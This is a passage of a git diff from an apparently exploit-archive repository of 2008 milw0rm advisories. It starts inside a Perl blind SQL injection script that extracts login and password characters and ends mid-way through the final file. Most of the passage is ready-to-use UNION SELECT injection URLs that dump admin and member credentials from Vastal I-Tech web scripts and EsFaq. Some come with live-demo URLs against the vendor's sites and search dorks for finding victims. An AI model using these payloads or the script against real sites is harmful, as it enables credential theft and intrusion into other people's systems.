\$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; + last ; + } + } + + $position++ ; + } + + print "[i] USER / PASSWORD:\n$sql_message\n" ; + +} + +sub _CHECKING +{ + my ($p, $position) = @_ ; + my $counter = 0 ; + my $stop_position ; + + foreach my $ascii ( @ascii ) + { + $counter++ ; + + if( $counter % $p->{'-t'} == 0 ) + { + my $stop_position ; + eval + { + $SIG{'ALRM'} = sub { die "non_stop\n" } ; + alarm $DEFAULT_THREADS_TIME ; + my $line = ; + $stop_position = (split( / /, $line))[1] ; + alarm 0 ; + } ; + + if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } + } + + unless(my $pid = fork ) + { + print Ws "pid:$pid\n" or die ; + + + my $url = $p->{'-u'} . + ' AND ascii(substring((SELECT CONCAT(login,0x202f20,password) FROM usuarios LIMIT 0,1),' . $position . ',1))='. $ascii ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my $content ; + while( 1 ) + { + last if $content = $ua->get( $url )->content ; + } + + ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; + + exit( 0 ) ; + } + + } +} + + + +sub _IS_VULN +{ + my $p = shift ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my ( $one, $two ) = ( + $ua->get( $p->{'-u'}." AND 1=1")->content , + $ua->get( $p->{'-u'}." AND 1=2")->content , + ) ; + + return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; +} + +# milw0rm.com [2008-09-05] diff --git a/platforms/php/webapps/6371.txt b/platforms/php/webapps/6371.txt index ef45a4912..2dfb1f146 100755 --- a/platforms/php/webapps/6371.txt +++ b/platforms/php/webapps/6371.txt 
@@ -1,30 +1,30 @@
-#######################################################
-# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
-#
-# Author : DeViL iRaQ
-#
-# Email : guitar_lover46[at]yahoo[dot]com
-#
-# Price : $399.99 (:
-#
-# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
-#
-# Demo : http://www.vastal.com/real/
-#
-# Dork : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-# All members of the Forum WwW.Hussin-X.CoM
-# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
+#
+# Author : DeViL iRaQ
+#
+# Email : guitar_lover46[at]yahoo[dot]com
+#
+# Price : $399.99 (:
+#
+# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
+#
+# Demo : http://www.vastal.com/real/
+#
+# Dork : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+# All members of the Forum WwW.Hussin-X.CoM
+# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6373.txt b/platforms/php/webapps/6373.txt
index 3ed3cae49..09a919afb 100755
--- a/platforms/php/webapps/6373.txt
+++ b/platforms/php/webapps/6373.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability
-#
-# Author : DeViL iRaQ
-#
-# Email : guitar_lover46[at]yahoo[dot]com
-#
-# Price : $550.00
-#
-# Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
-#
-# Demo : http://www.vastal.com/law_firm/
-#
-# Dork : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/law_firm/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-# All members of the Forum WwW.Hussin-X.CoM
-# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability
+#
+# Author : DeViL iRaQ
+#
+# Email : guitar_lover46[at]yahoo[dot]com
+#
+# Price : $550.00
+#
+# Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
+#
+# Demo : http://www.vastal.com/law_firm/
+#
+# Dork : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/law_firm/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+# All members of the Forum WwW.Hussin-X.CoM
+# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6374.txt b/platforms/php/webapps/6374.txt
index 36755f869..75a2f2f2e 100755
--- a/platforms/php/webapps/6374.txt
+++ b/platforms/php/webapps/6374.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Toner Cart ( show_series_ink.php id ) SQL Injection Vulnerability
-#
-# Author : DeViL iRaQ
-#
-# Email : guitar_lover46[at]yahoo[dot]com
-#
-# Price : $400.00
-#
-# Script Home Page : http://www.vastal.com/toner-cart-a-specialized-script-to-help-you-sell-toners-online.html
-#
-# Demo : http://www.vastal.com/united/
-#
-# Dork : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/united/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-# All members of the Forum WwW.Hussin-X.CoM
-# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Toner Cart ( show_series_ink.php id ) SQL Injection Vulnerability
+#
+# Author : DeViL iRaQ
+#
+# Email : guitar_lover46[at]yahoo[dot]com
+#
+# Price : $400.00
+#
+# Script Home Page : http://www.vastal.com/toner-cart-a-specialized-script-to-help-you-sell-toners-online.html
+#
+# Demo : http://www.vastal.com/united/
+#
+# Dork : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/united/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+# All members of the Forum WwW.Hussin-X.CoM
+# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6375.txt b/platforms/php/webapps/6375.txt
index 3f9fabaa9..209878962 100755
--- a/platforms/php/webapps/6375.txt
+++ b/platforms/php/webapps/6375.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Share Zone ( id ) SQL Injection Vulnerability
-#
-# Author : DeViL iRaQ
-#
-# Email : guitar_lover46[at]yahoo[dot]com
-#
-# Price : $200.00
-#
-# Script Home Page : http://www.vastal.com/share-zone-the-file-sharing-software.html
-#
-# Demo : http://www.vastal.com/rapid/
-#
-# Dork : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/rapid/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-# All members of the Forum WwW.Hussin-X.CoM
-# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Share Zone ( id ) SQL Injection Vulnerability
+#
+# Author : DeViL iRaQ
+#
+# Email : guitar_lover46[at]yahoo[dot]com
+#
+# Price : $200.00
+#
+# Script Home Page : http://www.vastal.com/share-zone-the-file-sharing-software.html
+#
+# Demo : http://www.vastal.com/rapid/
+#
+# Dork : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/rapid/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+# All members of the Forum WwW.Hussin-X.CoM
+# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6376.txt b/platforms/php/webapps/6376.txt
index 881c81519..cd0e3494a 100755
--- a/platforms/php/webapps/6376.txt
+++ b/platforms/php/webapps/6376.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech DVD Zone ( cat_id ) SQL Injection Vulnerability
-#
-# Author : DeViL iRaQ
-#
-# Email : guitar_lover46[at]yahoo[dot]com
-#
-# Price : $399.99 (:
-#
-# Script Home Page : hhttp://www.vastal.com/dvd-zone-dvd-rental-script.html
-#
-# Demo : http://dvdzone.vastal.com/
-#
-# Dork : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
-#
-# Live Demo:
-# http://dvdzone.vastal.com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-# All members of the Forum WwW.Hussin-X.CoM
-# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech DVD Zone ( cat_id ) SQL Injection Vulnerability
+#
+# Author : DeViL iRaQ
+#
+# Email : guitar_lover46[at]yahoo[dot]com
+#
+# Price : $399.99 (:
+#
+# Script Home Page : hhttp://www.vastal.com/dvd-zone-dvd-rental-script.html
+#
+# Demo : http://dvdzone.vastal.com/
+#
+# Dork : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
+#
+# Live Demo:
+# http://dvdzone.vastal.com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+# All members of the Forum WwW.Hussin-X.CoM
+# Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6378.txt b/platforms/php/webapps/6378.txt
index 385f8e53d..b575266ee 100755
--- a/platforms/php/webapps/6378.txt
+++ b/platforms/php/webapps/6378.txt
@@ -1,18 +1,18 @@
-#######################################################
-# Vastal I-Tech Jobs Zone SQL Injection Vulnerability
-#
-# Author : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html
-#
-# Demo : http://www.vastal.com/jobs/
-#######################################################
-Exploit:
-http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
-Live Demo
-http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-##############################################################################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Jobs Zone SQL Injection Vulnerability
+#
+# Author : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html
+#
+# Demo : http://www.vastal.com/jobs/
+#######################################################
+Exploit:
+http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
+Live Demo
+http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+##############################################################################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6379.txt b/platforms/php/webapps/6379.txt
index a2824d4a6..e7c9cc6e7 100755
--- a/platforms/php/webapps/6379.txt
+++ b/platforms/php/webapps/6379.txt
@@ -1,22 +1,22 @@
-#######################################################
-# Vastal I-Tech MMORPG Zone SQL Injection Vulnerability
-#
-# Author : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/mmorpg-zone-sell-mmorpg-online.html
-#
-# Demo : http://www.vastal.com/games/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
-http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
-
-Live Demo
-
-http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
-http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech MMORPG Zone SQL Injection Vulnerability
+#
+# Author : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/mmorpg-zone-sell-mmorpg-online.html
+#
+# Demo : http://www.vastal.com/games/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
+http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
+
+Live Demo
+
+http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
+http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6380.txt b/platforms/php/webapps/6380.txt
index bca741f5d..76b1bf6c3 100755
--- a/platforms/php/webapps/6380.txt
+++ b/platforms/php/webapps/6380.txt
@@ -1,18 +1,18 @@
-#######################################################
-# Vastal I-Tech Mag Zone SQL Injection Vulnerability
-#
-# Author : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
-#
-# Demo : http://www.vastal.com/mag/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
-Live Demo
-http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Mag Zone SQL Injection Vulnerability
+#
+# Author : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
+#
+# Demo : http://www.vastal.com/mag/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
+Live Demo
+http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6381.txt b/platforms/php/webapps/6381.txt
index 2590de2d9..cc543dfe8 100755
--- a/platforms/php/webapps/6381.txt
+++ b/platforms/php/webapps/6381.txt
@@ -1,18 +1,18 @@
-#######################################################
-# Vastal I-Tech Freelance Zone SQL Injection Vulnerability
-#
-# Author : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
-#
-# Demo : http://www.vastal.com/freelance/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
-Live Demo
-http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Freelance Zone SQL Injection Vulnerability
+#
+# Author : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
+#
+# Demo : http://www.vastal.com/freelance/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
+Live Demo
+http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6382.txt b/platforms/php/webapps/6382.txt
index 4d7d78e9c..bb0c1e0df 100755
--- a/platforms/php/webapps/6382.txt
+++ b/platforms/php/webapps/6382.txt
@@ -1,18 +1,18 @@
-#######################################################
-# Vastal I-Tech Cosmetics Zone SQL Injection Vulnerability
-#
-# Author : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/cosmetics-zone-a-shopping-cart-for-your-cosmetics-shop-online.html
-#
-# Demo : http://www.vastal.com/cosmetics_zone/
-#######################################################
-
-Exploit:
-http://site.il/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-Live Demo
-http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-##############################################################################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Cosmetics Zone SQL Injection Vulnerability
+#
+# Author : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/cosmetics-zone-a-shopping-cart-for-your-cosmetics-shop-online.html
+#
+# Demo : http://www.vastal.com/cosmetics_zone/
+#######################################################
+
+Exploit:
+http://site.il/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+Live Demo
+http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+##############################################################################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6383.txt b/platforms/php/webapps/6383.txt
index a530b6a58..6db3bf9c3 100755
--- a/platforms/php/webapps/6383.txt
+++ b/platforms/php/webapps/6383.txt
@@ -1,44 +1,44 @@
-|___________________________________________________|
-|
-| EsFaq Remote Sql Injection Exploit
-|
-|___________________________________________________
-|---------------------SuB-ZeRo----------------------|
-|
-| Author: SuB-ZeRo
-|
-| Home : www.dz-security.com
-|
-| email: FbH@hotmail.com
-|
-|
-|___________________________________________________
-| |
-|
-| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
-|
-| DorK : inurl:questions.php?idcat
-|___________________________________________________|
-Exploit:
-________
-
-www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
-
-
-
-L!VE DEMO:
-_________
-http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
-
-____________
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum www.dz-security.com and www.no-exploit.com
-|
-| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf
-|
-| and all algeria hackers and all mouslimme
-|__________________________ramadan karim all mouslimme____________________________________________
-
-# milw0rm.com [2008-09-05]
+|___________________________________________________|
+|
+| EsFaq Remote Sql Injection Exploit
+|
+|___________________________________________________
+|---------------------SuB-ZeRo----------------------|
+|
+| Author: SuB-ZeRo
+|
+| Home : www.dz-security.com
+|
+| email: FbH@hotmail.com
+|
+|
+|___________________________________________________
+| |
+|
+| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
+|
+| DorK : inurl:questions.php?idcat
+|___________________________________________________|
+Exploit:
+________
+
+www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
+
+
+
+L!VE DEMO:
+_________
+http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
+
+____________
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum www.dz-security.com and www.no-exploit.com
+|
+| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf
+|
+| and all algeria hackers and all mouslimme
+|__________________________ramadan karim all mouslimme____________________________________________
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6385.txt b/platforms/php/webapps/6385.txt
index 6f6a71922..5d24e63db 100755
--- a/platforms/php/webapps/6385.txt
+++ b/platforms/php/webapps/6385.txt
@@ -1,24 +1,24 @@ -####################Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability########## - -########By: e.wiZz! -########Site: infected.blogger.ba -########Info: Bosnian Idiot FTW! - -########Greetz: str0ke,aluigi,suN8Hclf,0in,Rishi Narang,f34r - - -In the wild... - -############################################################################## - -#####Info: Shaadi Zone is the best solution if you are looking to run a matrimonial services services. We have integrated many features which you can use and take full advantage of the matrimonial services. You can run a site like shaadi or bharatmatrimoniy easily. - -#####Vulnerability: - -http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL - -####PoC on demo site: - -http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/* - -# milw0rm.com [2008-09-05] +####################Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability########## + +########By: e.wiZz! +########Site: infected.blogger.ba +########Info: Bosnian Idiot FTW! + +########Greetz: str0ke,aluigi,suN8Hclf,0in,Rishi Narang,f34r + + +In the wild... + +############################################################################## + +#####Info: Shaadi Zone is the best solution if you are looking to run a matrimonial services services. We have integrated many features which you can use and take full advantage of the matrimonial services. You can run a site like shaadi or bharatmatrimoniy easily. 
+ +#####Vulnerability: + +http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL + +####PoC on demo site: + +http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/* + +# milw0rm.com [2008-09-05] diff --git a/platforms/php/webapps/6388.txt b/platforms/php/webapps/6388.txt index e363257f7..dc797771a 100755 --- a/platforms/php/webapps/6388.txt +++ b/platforms/php/webapps/6388.txt 
@@ -1,36 +1,36 @@ -########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## - -Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - - author: ZoRLu - - home: yildirimordulari.org - - - z0rlu.blogspot.com - - - r00tsecurity.org - -contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn ) - - Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... : ( ( - - Not: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( - - dork: "advanced_search_results.php?gender=" - -########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## - -http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15 - -demo: - -http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15 - - -########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## - -thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs - -Efsane: YILDIRIMORDULARI.ORG - -Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) ) - -########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## - -# milw0rm.com [2008-09-06] +########## ZoRLu - - - yildirimordulari.org 
- - - z0rlu.blogspot.com ############################## + +Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability + + author: ZoRLu + + home: yildirimordulari.org - - - z0rlu.blogspot.com - - - r00tsecurity.org + +contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn ) + + Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... : ( ( + + Not: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( + + dork: "advanced_search_results.php?gender=" + +########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## + +http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15 + +demo: + +http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15 + + +########## ZoRLu - - 